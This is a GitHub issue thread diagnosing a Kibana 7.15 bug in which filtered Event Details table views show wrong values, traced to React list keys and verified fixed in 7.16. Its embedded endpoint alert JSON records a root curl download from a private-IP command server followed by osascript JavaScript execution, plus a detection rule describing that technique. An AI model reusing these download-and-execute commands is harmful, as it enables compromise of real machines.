[Security Solution] The Event Details Panel > Table view sometimes displays unexpected values when filtered

[andrew-goldstein]

Describe the bug:

@threat-punter reports:

When I look at the threat.* fields for an alert in 7.15 in the Table view, I see some values from other fields spilling over into the threat.* fields

Above: In the screenshot provided by David, the view is filtered by the text threat, and shows unexpected values for some fields

Reproducing the issue in a cloud-deployed 7.15 build

The issue was reproduced by accessing the Elastic Cloud-deployed 7.15 build of Kibana, and viewing a specific event _id: "U_EwgXwBQyGN7Uu9IgYB" in the Host > Events view, as shown in the screenshot below:

Above: Reproduced in the cloud-deployed 7.15 build of Kibana, hosted in Elastic Cloud

When the threat filter shown in the screenshot above was removed, the fields displayed their expected values, as shown in the screenshot below:

Reproducing the issue filtering by _index

The issue is not specific to threat.* fields.

For example, the expected value for _index is displayed correctly (using the cloud-deployed 7.15 build of Kibana) when the view is unfiltered:

Above: The expected value for _index is displayed correctly when the view is unfiltered

When the text _filter is added to the filter, the value for _index includes (unexpected) JSON:

Above: Filtering by _index displays unexpected JSON instead of the expected value, .ds-logs-endpoint.alerts-default-2021.09.23-000001

Although the data shown in the table appears to be corrupted, the correct value for _index is copied to the clipboard when users select the Copy to clipboard action for the _index field, as shown in the screenshot below:

Above: the correct value for _index is copied to the clipboard, even when the data appears corrupted

Reference: The raw event (via Dev Tools)

For reference, the raw event used to reproduce the screenshots above was retrieved via Dev Tools:

GET /.ds-logs-endpoint.alerts-default-2021.09.23-000001/_doc/U_EwgXwBQyGN7Uu9IgYB

and pasted into the Click to expand section below:

Click to expand / view the JSON view of the event used to reproduce the issue

{
"_index" : ".ds-logs-endpoint.alerts-default-2021.09.23-000001",
"_type" : "_doc",
"_id" : "U_EwgXwBQyGN7Uu9IgYB",
"_version" : 1,
"_seq_no" : 82,
"_primary_term" : 1,
"found" : true,
"_source" : {
  "agent" : {
    "build" : {
      "original" : "version: 7.15.0, compiled: Wed Sep 15 18:13:15 2021, branch: 7.15, commit: b11d0070df36138bb7f3d2e115992c02587853f3"
    },
    "id" : "abcde1c9-56ca-4ea8-bdee-abcde08f5db5",
    "type" : "endpoint",
    "version" : "7.15.0"
  },
  "process" : {
    "Ext" : {
      "ancestry" : [
        "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU4MDAtMTMyNzg3Mjg1ODcuOTE1OTcwMDA=",
        "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTgtMTMyNzg3Mjg1ODYuOTMyMzYyMDAw",
        "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTgtMTMyNzg3Mjg1ODYuOTMyMDM0MDAw",
        "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzc2MzU4MDAw",
        "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzU0MDUwMDAw",
        "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzUzMTg1MDAw",
        "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTEtMTMyNzg0NDkxODQuMA==",
        "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTAtMTMyNzg0NDkxODQuMA=="
      ]
    },
    "args" : [
      "osascript",
      "-l",
      "JavaScript"
    ],
    "parent" : {
      "name" : "bash",
      "pid" : 1,
      "args_count" : 0,
      "entity_id" : "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU4MDAtMTMyNzg3Mjg1ODcuOTE1OTcwMDA=",
      "executable" : "/bin/bash"
    },
    "name" : "osascript",
    "pid" : 5800,
    "args_count" : 3,
    "entity_id" : "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU4MDAtMTMyNzg3Mjg1ODcuOTQzMjYwMDA=",
    "command_line" : "osascript -l JavaScript",
    "executable" : "/usr/bin/osascript",
    "hash" : {
      "sha1" : "af3e5a4d47206121e95af6822e52ec2a86fae951",
      "sha256" : "d07c23a7b3302a646b9b1dd54e2aff85c9bc0bf6efa51d95616091ca12ff04b7",
      "md5" : "cb1d8bafe75ab4720e47a0b51a319a72"
    }
  },
  "rule" : {
    "reference" : [
      "https://github.com/its-a-feature/Mythic"
    ],
    "name" : "Download and Execution of JavaScript Payload",
    "ruleset" : "production",
    "description" : "Identifies when curl is used to download a JavaScript payload and subsequently execute it using the built-in osascript utility. An adversary may use this technique to execute their malicious payload and obtain initial access to an endpoint.",
    "id" : "871f0c30-a7c5-40a5-80e3-a50c6714632f",
    "version" : "1.0.2"
  },
  "message" : "Malicious Behavior Detection Alert: Download and Execution of JavaScript Payload",
  "@timestamp" : "2021-10-14T23:43:07.319012489Z",
  "Endpoint" : {
    "policy" : {
      "applied" : {
        "artifacts" : {
          "global" : {
            "identifiers" : [
              {
                "sha256" : "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658",
                "name" : "diagnostic-configuration-v1"
              },
              {
                "sha256" : "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
                "name" : "diagnostic-endpointmacho-v1-blocklist"
              },
              {
                "sha256" : "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
                "name" : "diagnostic-endpointmacho-v1-exceptionlist"
              },
              {
                "sha256" : "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
                "name" : "diagnostic-endpointmacho-v1-model"
              },
              {
                "sha256" : "bc716d312cb3fdc461c7c1b0098cd6b02b291ef05d2c302788f012f9f5edc809",
                "name" : "diagnostic-malware-signature-v1-macos"
              },
              {
                "sha256" : "3a54730cae6d34f107de8ea3fb07f47e18789d6cd201cfcabbfccc3dd4e63dde",
                "name" : "diagnostic-rules-macos-v1"
              },
              {
                "sha256" : "39fecb66f9337eb33f5c0359f51ad37761ff13e4a7c4be390e03d2c227ac7cf6",
                "name" : "endpointmacho-v1-blocklist"
              },
              {
                "sha256" : "cd570c4cb16e8cffc854a385e111fe08dd2d8268183d0d6ca4dea21723d299dd",
                "name" : "endpointmacho-v1-exceptionlist"
              },
              {
                "sha256" : "6e886eeb015f3e837da5cd6ddcd6a371db28f71d2d703b8d22e194ef393bc311",
                "name" : "endpointmacho-v1-model"
              },
              {
                "sha256" : "4f91518da209eea573d18a3e6c8d767c0668a2df1b600ac5d88d23fc103b1929",
                "name" : "global-configuration-v1"
              },
              {
                "sha256" : "4abf799e6b79f0ee66a2e0b3293a92c2a122a083274cbea9d1b2c83bf57ffce7",
                "name" : "global-exceptionlist-macos"
              },
              {
                "sha256" : "9365c603590018c969300dfaec7f8758443f03b0e07a29087cfa19dd78298593",
                "name" : "global-trustlist-macos-v1"
              },
              {
                "sha256" : "0f23c6999c18471b4c8208fd5e822262579747cf6db8a30116d17fe4fd780d66",
                "name" : "production-malware-signature-v1-macos"
              },
              {
                "sha256" : "f931c50d21d64efe1cb79349f1568f9854f4c4f8bb0e7fe50b794694f604ede6",
                "name" : "production-rules-macos-v1"
              }
            ],
            "version" : "1.0.144"
          },
          "user" : {
            "identifiers" : [
              {
                "sha256" : "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658",
                "name" : "endpoint-eventfilterlist-macos-v1"
              },
              {
                "sha256" : "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658",
                "name" : "endpoint-exceptionlist-macos-v1"
              },
              {
                "sha256" : "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658",
                "name" : "endpoint-trustlist-macos-v1"
              }
            ],
            "version" : "1.0.0"
          }
        }
      }
    }
  },
  "ecs" : {
    "version" : "1.11.0"
  },
  "Events" : [
    {
      "process" : {
        "Ext" : {
          "ancestry" : [
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTktMTMyNzg3Mjg1ODcuOTA0NzgwMDA=",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTgtMTMyNzg3Mjg1ODYuOTMyMzYyMDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTgtMTMyNzg3Mjg1ODYuOTMyMDM0MDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzc2MzU4MDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzU0MDUwMDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzUzMTg1MDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTEtMTMyNzg0NDkxODQuMA==",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTAtMTMyNzg0NDkxODQuMA=="
          ]
        },
        "args" : [
          "curl",
          "-k",
          "https://172.16.22.6:7443/api/v1.4/files/download/caede788-17ad-4c88-9e66-3648f8d74068"
        ],
        "parent" : {
          "name" : "bash",
          "pid" : 1,
          "args_count" : 0,
          "entity_id" : "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTktMTMyNzg3Mjg1ODcuOTA0NzgwMDA=",
          "executable" : "/bin/bash"
        },
        "name" : "curl",
        "pid" : 5799,
        "args_count" : 3,
        "entity_id" : "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTktMTMyNzg3Mjg1ODcuOTMxMDcwMDA=",
        "command_line" : "curl -k https://172.16.22.6:7443/api/v1.4/files/download/caede788-17ad-4c88-9e66-3648f8d74068",
        "executable" : "/usr/bin/curl",
        "hash" : {
          "sha1" : "37a6cc88708627f02e3709088c5d21622d94b31f",
          "sha256" : "89e3d7d8bb6fde129bdcbb574b5fdff784691ccb6e7fbc5828b16fe788a3a08c",
          "md5" : "29e098ece154f7d7cfed28bcec33fa92"
        }
      },
      "@timestamp" : "2021-10-14T23:43:07.093107Z",
      "event" : {
        "created" : "2021-10-14T23:43:07.093107Z",
        "kind" : "event",
        "action" : "exec",
        "id" : "MKFx9hsJM71wyDzr+++++KVL",
        "category" : [
          "process"
        ],
        "type" : [
          "start"
        ]
      },
      "message" : "Endpoint process event",
      "user" : {
        "Ext" : {
          "real" : {
            "name" : "root",
            "id" : 0
          }
        },
        "name" : "root",
        "id" : 0
      },
      "group" : {
        "Ext" : {
          "real" : {
            "name" : "wheel",
            "id" : 0
          }
        },
        "name" : "wheel",
        "id" : 0
      }
    },
    {
      "process" : {
        "Ext" : {
          "ancestry" : [
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU4MDAtMTMyNzg3Mjg1ODcuOTE1OTcwMDA=",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTgtMTMyNzg3Mjg1ODYuOTMyMzYyMDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTgtMTMyNzg3Mjg1ODYuOTMyMDM0MDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzc2MzU4MDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzU0MDUwMDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzUzMTg1MDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTEtMTMyNzg0NDkxODQuMA==",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTAtMTMyNzg0NDkxODQuMA=="
          ]
        },
        "args" : [
          "osascript",
          "-l",
          "JavaScript"
        ],
        "parent" : {
          "name" : "bash",
          "pid" : 1,
          "args_count" : 0,
          "entity_id" : "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU4MDAtMTMyNzg3Mjg1ODcuOTE1OTcwMDA=",
          "executable" : "/bin/bash"
        },
        "name" : "osascript",
        "pid" : 5800,
        "args_count" : 3,
        "entity_id" : "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU4MDAtMTMyNzg3Mjg1ODcuOTQzMjYwMDA=",
        "command_line" : "osascript -l JavaScript",
        "executable" : "/usr/bin/osascript",
        "hash" : {
          "sha1" : "af3e5a4d47206121e95af6822e52ec2a86fae951",
          "sha256" : "d07c23a7b3302a646b9b1dd54e2aff85c9bc0bf6efa51d95616091ca12ff04b7",
          "md5" : "cb1d8bafe75ab4720e47a0b51a319a72"
        }
      },
      "@timestamp" : "2021-10-14T23:43:07.094326Z",
      "event" : {
        "created" : "2021-10-14T23:43:07.094326Z",
        "kind" : "event",
        "action" : "exec",
        "id" : "MKFx9hsJM71wyDzr+++++KVM",
        "category" : [
          "process"
        ],
        "type" : [
          "start"
        ]
      },
      "message" : "Endpoint process event",
      "user" : {
        "Ext" : {
          "real" : {
            "name" : "root",
            "id" : 0
          }
        },
        "name" : "root",
        "id" : 0
      },
      "group" : {
        "Ext" : {
          "real" : {
            "name" : "wheel",
            "id" : 0
          }
        },
        "name" : "wheel",
        "id" : 0
      }
    },
    {
      "process" : {
        "Ext" : {
          "ancestry" : [
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTktMTMyNzg3Mjg1ODcuOTA0NzgwMDA=",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTgtMTMyNzg3Mjg1ODYuOTMyMzYyMDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTgtMTMyNzg3Mjg1ODYuOTMyMDM0MDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzc2MzU4MDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzU0MDUwMDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzUzMTg1MDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTEtMTMyNzg0NDkxODQuMA==",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTAtMTMyNzg0NDkxODQuMA=="
          ]
        },
        "args" : [
          "curl",
          "-k",
          "https://10.1.2.3:7443/api/v1.4/files/download/caede788-17ad-4c88-9e66-3648f8d74068"
        ],
        "parent" : {
          "name" : "bash",
          "pid" : 1,
          "args_count" : 0,
          "entity_id" : "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTktMTMyNzg3Mjg1ODcuOTA0NzgwMDA=",
          "executable" : "/bin/bash"
        },
        "name" : "curl",
        "pid" : 5799,
        "args_count" : 3,
        "entity_id" : "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTktMTMyNzg3Mjg1ODcuOTMxMDcwMDA=",
        "command_line" : "curl -k https://10.1.2.3:7443/api/v1.4/files/download/caede788-17ad-4c88-9e66-3648f8d74068",
        "executable" : "/usr/bin/curl",
        "hash" : {
          "sha1" : "37a6cc88708627f02e3709088c5d21622d94b31f",
          "sha256" : "89e3d7d8bb6fde129bdcbb574b5fdff784691ccb6e7fbc5828b16fe788a3a08c",
          "md5" : "29e098ece154f7d7cfed28bcec33fa92"
        }
      },
      "@timestamp" : "2021-10-14T23:43:07.093107Z",
      "event" : {
        "created" : "2021-10-14T23:43:07.093107Z",
        "kind" : "event",
        "action" : "exec",
        "id" : "MKFx9hsJM71wyDzr+++++KVL",
        "category" : [
          "process"
        ],
        "type" : [
          "start"
        ]
      },
      "message" : "Endpoint process event",
      "user" : {
        "Ext" : {
          "real" : {
            "name" : "root",
            "id" : 0
          }
        },
        "name" : "root",
        "id" : 0
      },
      "group" : {
        "Ext" : {
          "real" : {
            "name" : "wheel",
            "id" : 0
          }
        },
        "name" : "wheel",
        "id" : 0
      }
    },
    {
      "process" : {
        "Ext" : {
          "ancestry" : [
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU4MDAtMTMyNzg3Mjg1ODcuOTE1OTcwMDA=",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTgtMTMyNzg3Mjg1ODYuOTMyMzYyMDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTgtMTMyNzg3Mjg1ODYuOTMyMDM0MDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzc2MzU4MDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzU0MDUwMDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzUzMTg1MDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTEtMTMyNzg0NDkxODQuMA==",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTAtMTMyNzg0NDkxODQuMA=="
          ]
        },
        "args" : [
          "osascript",
          "-l",
          "JavaScript"
        ],
        "parent" : {
          "name" : "bash",
          "pid" : 1,
          "args_count" : 0,
          "entity_id" : "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU4MDAtMTMyNzg3Mjg1ODcuOTE1OTcwMDA=",
          "executable" : "/bin/bash"
        },
        "name" : "osascript",
        "pid" : 5800,
        "args_count" : 3,
        "entity_id" : "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU4MDAtMTMyNzg3Mjg1ODcuOTQzMjYwMDA=",
        "command_line" : "osascript -l JavaScript",
        "executable" : "/usr/bin/osascript",
        "hash" : {
          "sha1" : "af3e5a4d47206121e95af6822e52ec2a86fae951",
          "sha256" : "d07c23a7b3302a646b9b1dd54e2aff85c9bc0bf6efa51d95616091ca12ff04b7",
          "md5" : "cb1d8bafe75ab4720e47a0b51a319a72"
        }
      },
      "@timestamp" : "2021-10-14T23:43:07.094326Z",
      "event" : {
        "created" : "2021-10-14T23:43:07.094326Z",
        "kind" : "event",
        "action" : "exec",
        "id" : "MKFx9hsJM71wyDzr+++++KVM",
        "category" : [
          "process"
        ],
        "type" : [
          "start"
        ]
      },
      "message" : "Endpoint process event",
      "user" : {
        "Ext" : {
          "real" : {
            "name" : "root",
            "id" : 0
          }
        },
        "name" : "root",
        "id" : 0
      },
      "group" : {
        "Ext" : {
          "real" : {
            "name" : "wheel",
            "id" : 0
          }
        },
        "name" : "wheel",
        "id" : 0
      }
    }
  ],
  "data_stream" : {
    "namespace" : "default",
    "type" : "logs",
    "dataset" : "endpoint.alerts"
  },
  "elastic" : {
    "agent" : {
      "id" : "fd3d91c9-56ca-4ea8-bdee-88d0308f5db5"
    }
  },
  "host" : {
    "hostname" : "redacted.local",
    "os" : {
      "Ext" : {
        "variant" : "macOS"
      },
      "kernel" : "Darwin Kernel Version 20.4.0: Thu Apr 22 21:46:47 PDT 2021; root:xnu-7195.101.2~1/RELEASE_X86_64",
      "name" : "macOS",
      "family" : "macos",
      "type" : "macos",
      "version" : "11.3.1",
      "platform" : "macos",
      "full" : "macOS 11.3.1"
    },
    "ip" : [
      "127.0.0.1",
      "::1",
      "0000::1",
      "10.1.2.3",
      "0000::0000:0000:0000:0000"
    ],
    "name" : "redacted.local",
    "id" : "564DF6B5-6BA3-278A-DF1D-455EE74AAFBE",
    "mac" : [
      "aa:bb:cc:dd:ee:ff"
    ],
    "architecture" : "x86_64"
  },
  "threat" : [
    {
      "framework" : "MITRE ATT&CK",
      "technique" : [
        {
          "reference" : "https://attack.mitre.org/techniques/T1059/",
          "name" : "Command and Scripting Interpreter",
          "subtechnique" : [
            {
              "reference" : "https://attack.mitre.org/techniques/T1059/007/",
              "name" : "JavaScript/JScript",
              "id" : "T1059.007"
            }
          ],
          "id" : "T1059"
        }
      ],
      "tactic" : {
        "reference" : "https://attack.mitre.org/tactics/TA0002/",
        "name" : "Execution",
        "id" : "TA0002"
      }
    }
  ],
  "event" : {
    "severity" : 99,
    "code" : "behavior",
    "risk_score" : 99,
    "created" : "2021-10-14T23:43:07.319012489Z",
    "kind" : "alert",
    "module" : "endpoint",
    "type" : [
      "info",
      "allowed"
    ],
    "agent_id_status" : "verified",
    "sequence" : 48364,
    "ingested" : "2021-10-14T23:43:07Z",
    "action" : "rule_detection",
    "id" : "MKFx9hsJM71wyDzr+++++KW4",
    "category" : [
      "malware",
      "intrusion_detection"
    ],
    "dataset" : "endpoint.alerts",
    "outcome" : "success"
  },
  "user" : {
    "Ext" : {
      "real" : {
        "name" : "root",
        "id" : 0
      }
    },
    "name" : "root",
    "id" : 0
  },
  "group" : {
    "Ext" : {
      "real" : {
        "name" : "wheel",
        "id" : 0
      }
    },
    "name" : "wheel",
    "id" : 0
  }
}
}

A related React key issue

The values displayed in table view are rendered by the FieldValueCell component in the following file:

x-pack/plugins/security_solution/public/common/components/event_details/table/field_value_cell.tsx

A React key issue was recently spotted and fixed in this file while working on an unrelated enhancement #115141

The exact line in question changed the value of the key from:

<EuiText size="xs" key={value}>

to

<EuiFlexItem grow={false} key={`${i}-${value}`}>

The PR contains the following explanation of the change:

The original code used key={value}, but that's not correct because users may index a document like:

POST /test-delete-me/_doc/1?pretty
{
    "has_dupes": ["foo", "bar", "baz", "foo"]
}

, which when retrieved via GET /test-delete-me/_doc/1?pretty returns the non-unique values in the array:

{
  "_index" : "test-delete-me",
  "_id" : "1",
  "_version" : 1,
  "_seq_no" : 0,
  "_primary_term" : 1,
  "found" : true,
  "_source" : {
    "has_dupes" : [
      "foo",
      "bar",
      "baz",
      "foo"
    ]
  }
}

The official React docs on lists and keys link to Index as a key is an anti-pattern, which recommends evaluating three conditions to determine whether or not it's safe to use index as a key:

To help you decide, I put together three conditions which these examples have in common:

1. the list and items are static–they are not computed and do not change;
2. the items in the list have no ids;
3. the list is never reordered or filtered.

When all of them are met, you may safely use the index as a key.

Applying the criteria above, the details panel fails condition 3:

3. the list is never reordered or filtered.

because users can filter the view by value, as shown in the screenshot below:

At the time of the PR review above, this discussion was just theoretical, but per the next section below, applying the changes in that PR directly to the 7.15 branch resolves the issue when running a local Kibana instance against the same cloud deployment.

Applying the key changes to the 7.15 branch

First, the issue was reproduced with a local checkout of the 7.15 branch, connected to the cloud deployment:

Above: The issue reproduced with a local checkout of 7.15, connected to the cloud deployment

Next the two changes to the React keys in x-pack/plugins/security_solution/public/common/components/event_details/table/field_value_cell.tsx are applied directly to a local checkout of the Kibana 7.15 branch, as shown in the diff below:

Above: The key changes applied to a local checkout of 7.15

After making the key changes above, filtering by _index shows the correct value, as shown in the screenshot below:

Above: Filtering by _index shows the correct value when the key fixes are applied directly to the local checkout of 7.15

Filtering by threat also works correctly, even when multiple fields have the same value, for example:

threat.technique.subtechnique.name: "JavaScript/JScript"

and

threat.technique.subtechnique.name.text: "JavaScript/JScript"

as shown in the screenshot below:

Above: Filtering by threat works correctly, even when multiple fields have the same value

Duplicate field values when no filter is applied

You may have noticed that some fields had duplicate values, even when no filter was applied. For example the following screenshot is from the cloud-deployed version of Kibana:

Above: other fields, unfiltered, in the cloud-deployed version of Kibana

In the screenshot above, the Events.user.name displays the value root four times in the unfiltered view. Applying the React key fix described in the previous section does not change this behavior.

To better understand why this behavior, the raw JSON from the output of the following Dev Tools query:

GET /.ds-logs-endpoint.alerts-default-2021.09.23-000001/_doc/U_EwgXwBQyGN7Uu9IgYB

was copy-pasted into a JSON formatter that supported collapsing regions, as shown in screenshot below:

Above: The JSON representation of the event, collapsed to only show Events

Per the screenshot above:

• The _source document contains an array of Events
• The Events array contains four objects
• All four objects in the Events array have a child object named user

When expanded, all four Events.user.names have the value root, as shown in the screenshot below:

Above: all four Events.user.names have the value root

Using the technique above, the duplicate values were all found to be contained in the original source event, which is included in this issue. (The attached event may be re-indexed to verify the fix.)

Kibana/Elasticsearch Stack version:

7.15

Original install method (e.g. download page, yum, from source, etc.):

Elastic Cloud

[elasticmachine]

Pinging @elastic/security-solution (Team: SecuritySolution)

[andrew-goldstein]

@MadameSheema, the previously theoretical discussion re: React keys in #115141 identified this as a potential issue and fixed it in #115141

Would the team be willing to:

1. Reproduce this in a 7.15 deployment (if necessary, the raw event in the description above may be re-indexed)

2. Upgrade the deployment to 7.16 BC1 to verify that Improves the formatting of array values and JSON in the Event and Alert Details panels #115141 fixed the issue

?

cc: @paulewing @michaelolo24 @ecezalp

[ghost]

Hi @andrew-goldstein,

We have validated this ticket on 7.15.0 and 7.16.0 BC1 on-prem and Please find our below observations:

7.15.0 🔴

Threat Fields search with keyword threat

Threat Fields search without the keyword threat

Other Fields on search without the keyword _index

Host.ip Fields on table tab and json

7.16.0 BC1

Build Details:

Version:7.16.0 BC1
Build: 45504
COMMIT: 9231d806c9384df4026977ba7435a9302dc2d4ab

Threat Fields on Alerts Page ✔️

Threat Fields on Hosts Page ✔️

Threat Fields on Alerts Page search without the keyword threat ✔️

Threat Fields on Hosts Page search without the keyword threat ✔️

Other Fields on search without the keyword _index ✔️
Correct data is copied when Copy to clipboard

Other Fields on search with the keyword _index ✔️
Correct data is copied when Copy to clipboard

Host.ip Fields on table tab and json under Alerts Page ✔️

Host.ip Fields on table tab and json under Hosts Page ✔️

Observation in dev tools:

Note:

7.16.0 BC1 cloud production build is not available yet, we will perform the upgrade scenarios once the cloud build is available.

Please let us know if we are missing something.

Thanks!!

cc: @MadameSheema

[ghost]

Hi @andrew-goldstein,

We have validated this ticket on Upgrade the 7.15.0 to 7.16 BC1 and Please find our below observations:

After upgrade to 7.16.0 BC1

Build Details:

Version:7.16.0 BC1
Build: 45504
COMMIT: 9231d806c9384df4026977ba7435a9302dc2d4ab

Threat Fields on Alerts Page ✔️

Threat Fields on Hosts Page ✔️

Other Fields on search with the keyword _index ✔️
Correct data is copied when Copy to clipboard

Host.ip Fields on table tab and json under Alerts Page ✔️

Host.ip Fields on table tab and json under Hosts Page ✔️

Kindly let us know if anything else is required from our end or else we are good to close this issue.

Thanks!!

cc: @MadameSheema

[MadameSheema]

@andrew-goldstein can you please take a look at the above? Thanks :)

[andrew-goldstein]

Thanks @deepikakeshav-qasource for verifying that upgrading to 7.16.0 BC1 fixes the issue, and for the screenshots above!